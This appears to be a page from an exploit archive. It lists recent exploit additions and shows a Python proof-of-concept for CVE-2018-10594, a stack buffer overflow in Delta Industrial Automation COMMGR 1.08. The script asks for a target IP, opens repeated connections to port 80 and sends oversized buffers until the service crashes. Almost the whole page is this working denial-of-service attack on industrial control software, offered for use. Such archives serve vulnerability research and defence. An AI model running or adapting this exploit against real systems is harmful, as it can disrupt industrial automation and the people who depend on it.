e8a3702c6c
11 changes to exploits/shellcodes Core FTP LE 2.2 - Buffer Overflow (PoC) SIPp 3.6 - Local Buffer Overflow (PoC) Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC) Enhanced Mitigation Experience Toolkit (EMET) - XML External Entity Injection FTPShell client 6.70 (Enterprise edition) - Stack Buffer Overflow (Metasploit) Nagios XI 5.2.6-5.4.12 - Chained Remote Code Execution (Metasploit) Geutebruck 5.02024 G-Cam/EFD-2250 - Remote Command Execution (Metasploit) Geutebruck 5.02024 G-Cam/EFD-2250 - 'testaction.cgi' Remote Command Execution (Metasploit) Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit) VMware NSX SD-WAN Edge < 3.1.2 - Command Injection DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin) Dolibarr ERP CRM < 7.0.3 - PHP Code Injection Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)
34 lines
No EOL
905 B
Python
Executable file
34 lines
No EOL
905 B
Python
Executable file
# Exploit Title: Delta Electronics Delta Industrial Automation COMMGR
|
|
- Remote STACK-BASED BUFFER OVERFLOW
|
|
# Date: 02.07.2018
|
|
# Exploit Author: t4rkd3vilz
|
|
# Vendor Homepage: http://www.deltaww.com/
|
|
# Software Link: http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=2093&DocPath=1&hl=en-US
|
|
# Version:
|
|
COMMGR Version 1.08 and prior.
|
|
DVPSimulator EH2, EH3, ES2, SE, SS2
|
|
AHSIM_5x0, AHSIM_5x1
|
|
# Tested on: Kali Linux
|
|
# CVE : CVE-2018-10594
|
|
|
|
|
|
#Run exploit, result DOS
|
|
|
|
import socket
|
|
|
|
|
|
ip = raw_input("[+] IP to attack: ")
|
|
|
|
sarr = []
|
|
i = 0
|
|
while True:
|
|
try:
|
|
sarr.append(socket.create_connection((ip,80)))
|
|
print "[+] Connection %d" % i
|
|
crash1 = "\x41"*4412 +"\X42"*1000
|
|
sarr[i].send(crash1+'\r\n')
|
|
i+=1
|
|
except socket.error:
|
|
print "[*] Server crashed "
|
|
raw_input()
|
|
break |